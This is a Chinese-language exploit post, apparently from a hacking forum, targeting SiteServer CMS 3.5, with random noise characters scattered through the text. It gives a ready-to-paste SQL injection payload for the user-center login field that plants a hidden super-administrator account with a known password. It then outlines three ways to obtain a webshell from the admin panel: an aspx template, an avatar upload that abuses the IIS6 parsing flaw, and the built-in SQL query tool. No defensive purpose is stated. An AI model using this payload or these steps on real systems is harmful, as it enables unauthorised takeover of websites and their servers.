经测试秒杀最新的3.5版
# Q3 Y: W- k% t9 x3 ~& G5 kstieserver官网:www.siteserver.cn
% t# y {5 |7 ~EXP:- f; D* Q- ?* b+ y
直接访问UserCenter/login.aspx
. T" j: r% i7 g6 ]1 V. h用户名处输入:- H# e. w& Q. L0 f2 y' ~
; V$ Q8 s* M9 ?' j
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–6 d; \+ \0 P. ]1 S6 y8 ~( {
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
9 [# t- `1 I2 g. U之后再访问后台SiteServer/login.aspx用插入的用户登陆& v1 P: ^% | ?# _( }8 N( C- |! j9 x) x
后台拿webshell的三种方法:; i6 Y+ Q1 T, y) T( P, y
一、
* K# C% d+ |, {1 i& Z站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx! a, |( p4 H# n* m/ U, Y
二、4 o E1 M. C: L1 P! L
成员权限-》添加用户-》用户名为:1.asp
" Y) S$ |" d4 x) m I9 q6 q6 F0 Qhttp://127.0.0.1/usercenter/
; O u% I: R% V0 X/ O1 h7 f用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
' u' O, D8 u+ F2 k(ps:后台添加用户时不会验证是否含有非法字符)' Z7 i) o0 q* z( ]* b$ w, c: W
三、
Z' |6 z) Z/ X5 U系统工具-》实用工具-》机器参数查看* ~; k7 p q, v" p4 S3 M* c2 ?* o
可以看到数据库类型、名称,WEB路径
. M: F( ?3 E: h; m' m7 R系统工具-》数据库工具-》SQL语句查询5 i! s4 @ d9 Y5 M
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |